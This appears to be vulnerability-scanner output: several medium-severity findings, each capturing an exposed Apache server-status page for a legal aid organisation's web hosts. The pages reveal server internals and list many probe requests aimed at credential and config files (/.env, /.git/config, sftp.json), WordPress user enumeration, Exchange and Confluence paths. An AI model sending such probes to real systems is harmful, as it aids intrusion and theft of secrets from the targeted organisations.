56-245-0/0/2214. 0.4014503300.00.0043.0
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93feabe6c3614
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Monday, 11-Dec-2023 23:59:44 UTC Restart Time: Friday, 21-Apr-2023 15:43:58 UTC Parent Server Config. Generation: 235 Parent Server MPM Generation: 234 Server uptime: 234 days 8 hours 15 minutes 45 seconds Server load: 0.08 0.03 0.09 Total accesses: 4508775 - Total Traffic: 55.7 GB CPU Usage: u52.21 s8.74 cu0 cs0 - .000301% CPU load .223 requests/sec - 2953 B/second - 13.0 kB/request 12 requests currently being processed, 5 idle workers __WKKWKK_KK_.......K...W.............K..K..._................... ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-23483030/2/329246_ 0.1723780.00.144171.38 70.132.1.81http/1.1events.alas.org:8080GET /v2/_catalog HTTP/1.1 1-23482460/9/324633_ 0.7422670.00.414174.81 70.132.1.81http/1.1events.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 2-23483084/4/311779W 0.4700100.40.104090.88 70.132.4.67http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 3-23482917/13/306866K 0.470011.50.103915.31 70.132.4.67http/1.1elearning.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 4-23482616/11/298806K 0.910270680.20.903763.13 70.132.1.81http/1.1events.alas.org:8080GET /.env HTTP/1.1 5-23483094/4/289258W 0.00004.20.003679.79 70.132.1.81http/1.1events.alas.org:8080GET /config.json HTTP/1.1 6-23482926/12/274550K 0.7100305.70.453587.00 70.132.1.81http/1.1on.alas.org:8080GET /_all_dbs HTTP/1.1 7-23482771/7/272958K 0.13301.00.043463.71 70.132.4.95http/1.1on.alas.org:8080GET /.DS_Store HTTP/1.1 8-23483180/1/250555_ 0.1612880.00.153443.12 70.132.1.81http/1.1events.alas.org:8080GET /_all_dbs HTTP/1.1 9-23483191/1/246725K 0.00001.10.002866.10 70.132.4.89http/1.1elearning.alas.org:8080GET /v2/_catalog HTTP/1.1 10-23483241/1/216088K 0.180286148.80.152845.94 70.132.1.81http/1.1events.alas.org:8080GET /s/9353e29383e2430323e2334313/_/;/META-INF/maven/com.atlass 11-23483250/0/183786_ 1.04200.00.002470.19 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 12-234-0/0/170907. 3.83114700.00.002148.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 13-234-0/0/130955. 1.04116000.00.001544.03 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-234-0/0/111588. 1.03115900.00.001248.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 15-234-0/0/109341. 1.03115100.00.001285.69 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 16-234-0/0/97182. 1.03116300.00.001152.97 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 17-234-0/0/50927. 1.1473500.00.00622.53 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-234-0/0/40368. 1.2064400.00.00477.62 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 19-23479621/12/38875K 1.2943331.00.09509.33 130.176.137.97http/1.1events.alas.org:8080POST /wp-cron.php?doing_wp_cron=1702339179.19895195960998535156 20-234-0/0/35441. 1.06114800.00.00447.34 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 21-234-0/0/33924. 1.0973400.00.00469.02 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 22-234-0/0/34615. 0.54118700.00.00402.93 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 23-234797414/25/34620W 2.0700180.70.28415.35 70.132.4.67http/1.1atlantalegalaid.org:8080GET /telescope/requests HTTP/1.1 24-234-0/0/31209. 0.53118800.00.00325.39 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 25-234-0/0/13335. 1.05115400.00.00218.16 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 26-234-0/0/11615. 1.06116100.00.00187.83 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 27-234-0/0/13719. 1.05116400.00.00182.52 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 28-234-0/0/14323. 1.05115600.00.00156.75 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 29-234-0/0/10153. 1.06115800.00.00142.35 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 30-234-0/0/11140. 1.05115700.00.00173.81 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-234-0/0/15609. 1.06114900.00.00161.00 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 32-234-0/0/12668. 1.05115300.00.00148.50 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 33-234-0/0/9795. 0.54119400.00.00155.14 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-234-0/0/12528. 1.05117400.00.00136.05 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 35-234-0/0/9897. 1.06117300.00.00120.88 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 36-234-0/0/9822. 1.06115500.00.00137.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 37-23480568/19/12165K 1.880398206.10.31141.41 70.132.4.67http/1.1atlantalegalaid.org:8080GET /config.json HTTP/1.1 38-234-0/0/11727. 1.04116900.00.00119.29 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 39-234-0/0/10203. 1.06115000.00.00132.38 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 40-234806710/21/10349K 2.0700211.30.34101.90 70.132.4.67http/1.1secure.alas.org:8080GET /_all_dbs HTTP/1.1 41-234-0/0/4243. 1.05116700.00.0042.31 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 42-234-0/0/4821. 1.05116600.00.0051.10 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 43-234-0/0/4160. 1.05115200.00.0029.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 44-23480830/19/1822_ 1.7213540.00.2226.80 70.132.4.67http/1.1atlantalegalaid.org:8080GET /_all_dbs HTTP/1.1 45-234-0/0/2783. 1.05116800.00.0034.58 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 46-234-0/0/2002. 0.00121000.00.0018.46 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 47-234-0/0/2371. 0.00121300.00.0038.72 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 48-234-0/0/2916. 0.00121200.00.0036.70 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-234-0/0/2966. 0.00121100.00.0027.80 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 50-234-0/0/2910. 0.00120900.00.0035.87 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 51-234-0/0/1577. 0.00120800.00.0024.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 52-234-0/0/2378. 0.00120700.00.0026.51 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 53-234-0/0/1833. 0.00120600.00.0022.65 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 54-234-0/0/1464. 0.00118600.00.0028.57 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 55-234-0/0/3144. 0.04118400.00.0024.04 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 56-234-0/0/2104
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93fea1f1afadf
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Monday, 11-Dec-2023 00:08:21 UTC Restart Time: Friday, 21-Apr-2023 15:43:58 UTC Parent Server Config. Generation: 234 Parent Server MPM Generation: 233 Server uptime: 233 days 8 hours 24 minutes 23 seconds Server load: 3.05 0.64 0.21 Total accesses: 4485569 - Total Traffic: 55.3 GB CPU Usage: u68.8 s11.07 cu0 cs0 - .000396% CPU load .222 requests/sec - 2946 B/second - 12.9 kB/request 91 requests currently being processed, 42 idle workers KKK_KKKKKW_KK_KKKKKKKKKKKKKWKWKKKKKK_KKK__K_KWK_K___K_W_KWKKKWWK WKKK_KKKK___KKCKKK____K__CK_K_KKK__KKKK_KK_KKK____KKKKKKKKK.._.C .________............. Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-233160634/39/327492K 3.003035.02.114150.00 70.132.4.95http/1.1elearning.alas.org:8080GET /s/5323e2531323e2430323e2334313/_/;/META-INF/maven/com.atla 1-2331593110/70/322982K 3.63014461.90.634144.74 70.132.4.67http/1.1survey.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-2331605810/43/310263K 1.80367458.00.374051.37 70.132.4.67http/1.1survey.alas.org:8080GET /server-status HTTP/1.1 3-233156930/101/305276_ 2.7914580.00.963878.42 70.132.4.67http/1.1atlantalegalaid.org:8080GET /v2/_catalog HTTP/1.1 4-233160688/42/297247K 2.01147722.50.433735.41 70.132.4.67http/1.1elearning.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 5-233164409/11/288158K 0.262050.10.093666.55 70.132.4.67http/1.1elearning.alas.org:8080GET /telescope/requests HTTP/1.1 6-233164518/8/273017K 0.39056085.10.083571.13 70.132.4.67http/1.1atlantalegalaid.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 7-233163568/16/271795K 0.92108.70.113442.01 70.132.4.67http/1.1elearning.alas.org:8080GET /about HTTP/1.1 8-233164567/7/249302K 0.32112453.80.053420.77 70.132.4.67http/1.1survey.alas.org:8080GET /s/232313e2531323e2430323e2334313/_/;/META-INF/maven/com.at 9-233164576/6/245603W 0.270048.10.052841.83 70.132.4.67http/1.1survey.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 10-233158950/78/215156_ 3.32255880.01.982830.99 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 11-233163628/16/182736K 0.272012.00.052458.31 70.132.4.67http/1.1elearning.alas.org:8080GET /.env HTTP/1.1 12-233164669/9/169991K 0.591681126.10.122133.23 70.132.4.95http/1.1atlantalegalaid.org:8080GET /debug/default/view?panel=config HTTP/1.1 13-233164670/4/130530_ 0.72253860.00.121539.01 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 14-233154789/112/111199K 4.230214100.34.091242.79 70.132.4.67http/1.1survey.alas.org:8080GET /_all_dbs HTTP/1.1 15-233164727/7/109011K 0.221013.60.011281.97 70.132.4.67http/1.1survey.alas.org:8080GET /.env HTTP/1.1 16-233164779/9/96959K 0.321019.50.021143.66 70.132.4.95http/1.1survey.alas.org:8080GET /.git/config HTTP/1.1 17-233164866/6/50697K 0.910204248.00.24619.36 70.132.4.67http/1.1survey.alas.org:8080GET /telescope/requests HTTP/1.1 18-233164877/7/40074K 0.02008.80.01468.06 70.132.4.67http/1.1elearning.alas.org:8080GET /v2/_catalog HTTP/1.1 19-233164927/7/38748K 0.10121613.40.01507.06 70.132.4.67http/1.1survey.alas.org:8080GET /config.json HTTP/1.1 20-2331649712/12/35312K 0.8820255.60.25446.49 70.132.4.89http/1.1survey.alas.org:8080GET /.DS_Store HTTP/1.1 21-233165026/6/33838K 0.272148773.50.07464.90 70.132.4.67http/1.1atlantalegalaid.org:8080GET /about HTTP/1.1 22-233165037/7/34479K 0.5507447.20.01401.93 70.132.4.67http/1.1events.alas.org:8080GET /about HTTP/1.1 23-233165087/7/34491K 0.31051877.80.08412.82 70.132.4.67http/1.1atlantalegalaid.org:8080GET /server-status HTTP/1.1 24-233165097/7/31140K 0.09012513.20.01324.44 70.132.4.67http/1.1survey.alas.org:8080GET /telescope/requests HTTP/1.1 25-233165275/5/13285K 0.282148541.10.04217.41 70.132.4.67http/1.1elearning.alas.org:8080GET / HTTP/1.1 26-233165285/5/11571K 0.382154476.70.07187.35 70.132.4.67http/1.1atlantalegalaid.org:8080GET /about HTTP/1.1 27-233165334/4/13516W 0.8500240.00.23180.83 70.132.4.67http/1.1atlantalegalaid.org:8080GET /server-status HTTP/1.1 28-233165386/6/14266K 0.10127811.50.01156.12 70.132.4.67http/1.1survey.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 29-233165395/5/10097W 0.170018.50.02141.49 70.132.4.67http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 30-233165404/4/11074K 0.7820235.20.23168.39 70.132.4.67http/1.1elearning.alas.org:8080GET /.git/config HTTP/1.1 31-233165414/4/15284K 0.33115339.50.04158.30 70.132.4.67http/1.1survey.alas.org:8080GET /server-status HTTP/1.1 32-233165465/5/12573K 0.21232713.20.01147.66 70.132.4.67http/1.1survey.alas.org:8080GET /v2/_catalog HTTP/1.1 33-233165475/5/9724K 0.23284916.10.02153.61 70.132.4.67http/1.1survey.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 34-233165486/6/12241K 0.08126411.20.01134.04 70.132.4.67http/1.1survey.alas.org:8080GET /_all_dbs HTTP/1.1 35-233165494/4/9834K 0.862299241.40.24119.81 70.132.4.67http/1.1survey.alas.org:8080GET /_all_dbs HTTP/1.1 36-233165660/4/9795_ 0.27331730.00.05137.33 70.132.4.67http/1.1atlantalegalaid.org:8080GET /about HTTP/1.1 37-233165674/4/12114K 0.480584100.40.10140.69 70.132.4.67http/1.1atlantalegalaid.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 38-233165684/4/11701K 0.8020236.60.23118.85 70.132.4.67http/1.1elearning.alas.org:8080GET /lib/editor/tiny/loader.php?rev=abc&filepath=hello.css HTTP 39-233165976/6/10162K 0.04108.10.01132.04 70.132.4.67http/1.1survey.alas.org:8080GET /.DS_Store HTTP/1.1 40-233165980/2/10304_ 0.68260180.00.09101.36 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 41-233166070/1/4214_ 0.68261830.00.0942.23 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 42-2331660815/15/4799K 0.080019.90.0250.64 70.132.4.89http/1.1survey.alas.org:8080GET /.git/config HTTP/1.1 43-233166090/2/4141_ 0.67255940.00.0829.62 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 44-233166105/5/1789K 0.111011.30.0126.32 70.132.4.67http/1.1survey.alas.org:8080GET /.git/config HTTP/1.1 45-233166115/5/2762W 0.02005.90.0134.15 70.132.4.67http/1.1atlantalegalaid.org:8080GET /_all_dbs HTTP/1.1 46-233166124/4/1981K 0.490411135.80.1318.23 70.132.4.67http/1.1atlantalegalaid.org:8080GET /server-status HTTP/1.1 47-233166130/1/2361_ 0.61356010.00.0238.65 70.132.4.89http/1.1events.alas.org:8080GET / HTTP/1.1 48-233166144/4/2891K 0.83081136.60.0436.57 70.132.4.67http/1.1events.alas.org:8080GET /about HTTP/1.1 49-233166150/1/2946_ 0.61354850.00.0827.69 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 50-233166160/1/2899_ 0.66355370.00.0935.84 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 51-233166530/4/1559_ 0.4714530.00.0723.88 70.132.4.67http/1.1atlantalegalaid.org:8080GET /v2/_catalog HTTP/1.1 52-233166547/7/2360K 0.58287085.90.0826.41 70.132.4.89http/
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93fea423d1eb4
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Monday, 11-Dec-2023 00:08:17 UTC Restart Time: Friday, 21-Apr-2023 15:43:58 UTC Parent Server Config. Generation: 234 Parent Server MPM Generation: 233 Server uptime: 233 days 8 hours 24 minutes 18 seconds Server load: 0.71 0.15 0.05 Total accesses: 4485423 - Total Traffic: 55.3 GB CPU Usage: u55.23 s8.32 cu0 cs0 - .000315% CPU load .222 requests/sec - 2946 B/second - 12.9 kB/request 124 requests currently being processed, 13 idle workers KKKKKKKKWKWKKWKKWKKKKKKKKKKWKKKKKKKKWKKKWWKWWKWWKWWKKWWKKKKKKKKK KKKKWKWKKWWKKKKKKKWWWWKWWKKWKWKKKKKKKWKWKKKKKKKWKKKKKKKKWWKC____ _________............. Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-233160632/37/327490K 3.000241632.82.104150.00 70.132.4.95http/1.1elearning.alas.org:8080GET / HTTP/1.1 1-233159318/68/322980K 3.460048.70.614144.73 70.132.4.67http/1.1on.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 2-233160589/42/310262K 1.7112952.20.374051.36 70.132.4.67http/1.1esign.alas.org:8080GET /about HTTP/1.1 3-233156939/100/305275K 2.570090.00.903878.36 70.132.4.67http/1.1short.alas.org:8080GET /s/3313e2531323e2430323e2334313/_/;/META-INF/maven/com.atla 4-233160687/41/297246K 1.780013.30.433735.40 70.132.4.67http/1.1short.alas.org:8080GET /config.json HTTP/1.1 5-233164408/10/288157K 0.260049.00.093666.55 70.132.4.67http/1.1elearning.alas.org:8080GET /v2/_catalog HTTP/1.1 6-233164516/6/273015K 0.161011.50.013571.06 70.132.4.67http/1.1secure.alas.org:8080GET /telescope/requests HTTP/1.1 7-233163567/15/271794K 0.92007.60.113442.01 70.132.4.67http/1.1survey.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 8-233164565/5/249300W 0.220045.50.043420.76 70.132.4.67http/1.1esign.alas.org:8080GET /telescope/requests HTTP/1.1 9-233164575/5/245602K 0.2711947.10.052841.83 70.132.4.67http/1.1esign.alas.org:8080GET /server-status HTTP/1.1 10-233158955/77/215155W 2.66306.51.892830.90 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 11-233163627/15/182735K 0.270011.00.052458.31 70.132.4.67http/1.1short.alas.org:8080GET /.env HTTP/1.1 12-233164667/7/169989K 0.3402158.10.062133.16 70.132.4.95http/1.1esign.alas.org:8080GET /.DS_Store HTTP/1.1 13-233164673/3/130529W 0.02307.40.011538.90 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 14-233154787/110/111197K 4.151193.34.081242.78 70.132.4.67http/1.1secure.alas.org:8080GET /server-status HTTP/1.1 15-233164726/6/109010K 0.220012.60.011281.97 70.132.4.67http/1.1short.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 16-233164777/7/96957W 0.240012.70.011143.65 70.132.4.95http/1.1survey.alas.org:8080GET /config.json HTTP/1.1 17-233164864/4/50695K 0.8200241.10.24619.35 70.132.4.67http/1.1esign.alas.org:8080GET /.env HTTP/1.1 18-233164875/5/40072K 0.020276.60.01468.06 70.132.4.67http/1.1esign.alas.org:8080GET /config.json HTTP/1.1 19-233164925/5/38746K 0.00105.30.01507.05 70.132.4.67http/1.1secure.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 20-2331649710/10/35310K 0.8700247.80.24446.48 70.132.4.89http/1.1elearning.alas.org:8080GET /lib/editor/tiny/loader.php?rev=abc&filepath=hello.css HTTP 21-233165025/5/33837K 0.01106.70.01464.83 70.132.4.67http/1.1on.alas.org:8080GET /s/3313e2531323e2430323e2334313/_/;/META-INF/maven/com.atla 22-233165036/6/34478K 0.00006.30.01401.93 70.132.4.67http/1.1elearning.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 23-233165085/5/34489K 0.08009.90.01412.76 70.132.4.67http/1.1on.alas.org:8080GET /config.json HTTP/1.1 24-233165096/6/31139K 0.01007.40.01324.43 70.132.4.67http/1.1secure.alas.org:8080GET /telescope/requests HTTP/1.1 25-233165274/4/13284K 0.03109.70.01217.38 70.132.4.67http/1.1short.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 26-233165284/4/11570K 0.14119.80.01187.29 70.132.4.67http/1.1short.alas.org:8080GET /server-status HTTP/1.1 27-233165333/3/13515W 0.7700234.20.23180.83 70.132.4.67http/1.1survey.alas.org:8080GET /about HTTP/1.1 28-233165385/5/14265K 0.00005.60.01156.11 70.132.4.67http/1.1on.alas.org:8080GET /telescope/requests HTTP/1.1 29-233165394/4/10096K 0.090012.70.01141.48 70.132.4.67http/1.1short.alas.org:8080GET /.env HTTP/1.1 30-233165403/3/11073K 0.7800234.20.23168.39 70.132.4.67http/1.1elearning.alas.org:8080GET /about HTTP/1.1 31-233165413/3/15283K 0.260250533.70.03158.29 70.132.4.67http/1.1elearning.alas.org:8080GET / HTTP/1.1 32-233165464/4/12572K 0.13007.40.01147.66 70.132.4.67http/1.1short.alas.org:8080GET /.git/config HTTP/1.1 33-233165474/4/9723K 0.13008.70.01153.60 70.132.4.67http/1.1short.alas.org:8080GET /config.json HTTP/1.1 34-233165485/5/12240K 0.00005.30.01134.03 70.132.4.67http/1.1secure.alas.org:8080GET /.env HTTP/1.1 35-233165493/3/9833K 0.78097235.50.23119.80 70.132.4.67http/1.1esign.alas.org:8080GET /telescope/requests HTTP/1.1 36-233165663/3/9794W 0.00103.10.00137.28 70.132.4.67http/1.1atlantalegalaid.org:8080GET /about HTTP/1.1 37-233165673/3/12113K 0.250285633.50.03140.63 70.132.4.67http/1.1elearning.alas.org:8080GET / HTTP/1.1 38-233165683/3/11700K 0.8000235.50.23118.85 70.132.4.67http/1.1short.alas.org:8080GET /s/232313e2531323e2430323e2334313/_/;/META-INF/maven/com.at 39-233165975/5/10161K 0.030757.10.01132.04 70.132.4.67http/1.1esign.alas.org:8080GET /s/232313e2531323e2430323e2334313/_/;/META-INF/maven/com.at 40-233165981/1/10303W 0.00401.00.00101.27 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 41-233166070/0/4213W 0.23400.00.0042.15 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 42-2331660812/12/4796K 0.0703816.70.0250.63 70.132.4.89http/1.1esign.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 43-233166091/1/4140W 0.00301.00.0029.54 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 44-233166103/3/1787W 0.02004.50.0026.31 70.132.4.67http/1.1survey.alas.org:8080GET /v2/_catalog HTTP/1.1 45-233166114/4/2761K 0.02104.80.0034.15 70.132.4.67http/1.1short.alas.org:8080GET /_all_dbs HTTP/1.1 46-233166122/2/1979W 0.01102.10.0018.09 70.132.4.67http/1.1atlantalegalaid.org:8080GET /.vscode/sftp.json HTTP/1.1 47-233166130/0/2360W 0.33400.00.0038.63 70.132.4.89http/1.1events.alas.org:8080GET / HTTP/1.1 48-233166142/2/2889K 0.2618233.40.0336.56 70.132.4.67http/1.1esign.alas.org:8080GET /server-status HTTP/1.1 49-233166150/0/2945W 0.00400.00.0027.61 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 50-233166160/0/2898W 0.00400.00.0035.76 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 51-233166533/3/1558K 0.250034.50.0323.84 70.132.4.67http/1.1esign.alas.org:8080GET /.git/config HTTP/1.1 52-233166545/5/2358K 0.340132275.70.0726.40 70.132.4.89http/1.1survey.alas.org:8080GET / H
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3161c93fea61c93fea76769596
Apache Status Apache Server Status for elearning.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Monday, 11-Dec-2023 00:08:18 UTC Restart Time: Friday, 21-Apr-2023 15:43:58 UTC Parent Server Config. Generation: 234 Parent Server MPM Generation: 233 Server uptime: 233 days 8 hours 24 minutes 20 seconds Server load: 3.05 0.64 0.21 Total accesses: 4485474 - Total Traffic: 55.3 GB CPU Usage: u56.42 s8.6 cu0 cs0 - .000322% CPU load .222 requests/sec - 2946 B/second - 12.9 kB/request 120 requests currently being processed, 16 idle workers KWKKKKKKKKWKKWKKKKKKWWKKKWWKKWKKKWKKWKKKWWKWKKK_K__KKWKKKKKKWKKK KKKWWKKKWWWKKKKKKKWWWWKWWKKWKWKWKKKWKKKWKKKKWKK_KKKKKKKKKKK.C___ _________............. Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-233160634/39/327492K 3.000035.02.114150.00 70.132.4.95http/1.1elearning.alas.org:8080GET /s/5323e2531323e2430323e2334313/_/;/META-INF/maven/com.atla 1-233159318/68/322980W 3.460048.70.614144.73 70.132.4.67http/1.1survey.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 2-2331605810/43/310263K 1.80067458.00.374051.37 70.132.4.67http/1.1survey.alas.org:8080GET /server-status HTTP/1.1 3-233156939/100/305275K 2.571090.00.903878.36 70.132.4.67http/1.1short.alas.org:8080GET /s/3313e2531323e2430323e2334313/_/;/META-INF/maven/com.atla 4-233160687/41/297246K 1.781013.30.433735.40 70.132.4.67http/1.1short.alas.org:8080GET /config.json HTTP/1.1 5-233164408/10/288157K 0.261049.00.093666.55 70.132.4.67http/1.1elearning.alas.org:8080GET /v2/_catalog HTTP/1.1 6-233164517/7/273016K 0.160118.20.023571.07 70.132.4.67http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 7-233163567/15/271794K 0.92107.60.113442.01 70.132.4.67http/1.1survey.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 8-233164566/6/249301K 0.2419847.90.053420.76 70.132.4.67http/1.1esign.alas.org:8080GET /telescope/requests HTTP/1.1 9-233164576/6/245603K 0.270048.10.052841.83 70.132.4.67http/1.1elearning.alas.org:8080GET /about HTTP/1.1 10-233158955/77/215155W 2.66406.51.892830.90 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 11-233163627/15/182735K 0.272011.00.052458.31 70.132.4.67http/1.1short.alas.org:8080GET /.env HTTP/1.1 12-233164668/8/169990K 0.341059.30.062133.16 70.132.4.95http/1.1elearning.alas.org:8080GET /_all_dbs HTTP/1.1 13-233164673/3/130529W 0.02407.40.011538.90 70.132.4.67http/1.1events.alas.org:8080GET / HTTP/1.1 14-233154788/111/111198K 4.150094.44.081242.78 70.132.4.67http/1.1elearning.alas.org:8080GET /s/3313e2531323e2430323e2334313/_/;/META-INF/maven/com.atla 15-233164726/6/109010K 0.221012.60.011281.97 70.132.4.67http/1.1short.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 16-233164778/8/96958K 0.32172118.50.021143.66 70.132.4.95http/1.1survey.alas.org:8080GET /config.json HTTP/1.1 17-233164865/5/50696K 0.8300242.10.24619.35 70.132.4.67http/1.1elearning.alas.org:8080GET /.env HTTP/1.1 18-233164875/5/40072K 0.021276.60.01468.06 70.132.4.67http/1.1esign.alas.org:8080GET /config.json HTTP/1.1 19-233164926/6/38747K 0.0201197.60.01507.05 70.132.4.67http/1.1esign.alas.org:8080GET /telescope/requests HTTP/1.1 20-2331649710/10/35310W 0.8700247.80.24446.48 70.132.4.89http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 21-233165025/5/33837W 0.01006.70.01464.83 70.132.4.67http/1.1atlantalegalaid.org:8080GET /about HTTP/1.1 22-233165036/6/34478K 0.00106.30.01401.93 70.132.4.67http/1.1elearning.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 23-233165086/6/34490K 0.080011.00.01412.76 70.132.4.67http/1.1elearning.alas.org:8080GET /.DS_Store HTTP/1.1 24-233165096/6/31139K 0.01107.40.01324.43 70.132.4.67http/1.1secure.alas.org:8080GET /telescope/requests HTTP/1.1 25-233165274/4/13284W 0.03009.70.01217.38 70.132.4.67http/1.1elearning.alas.org:8080GET / HTTP/1.1 26-233165284/4/11570W 0.14009.80.01187.29 70.132.4.67http/1.1atlantalegalaid.org:8080GET /about HTTP/1.1 27-233165334/4/13516K 0.850952240.00.23180.83 70.132.4.67http/1.1survey.alas.org:8080GET /about HTTP/1.1 28-233165385/5/14265K 0.00205.60.01156.11 70.132.4.67http/1.1on.alas.org:8080GET /telescope/requests HTTP/1.1 29-233165394/4/10096W 0.090012.70.01141.48 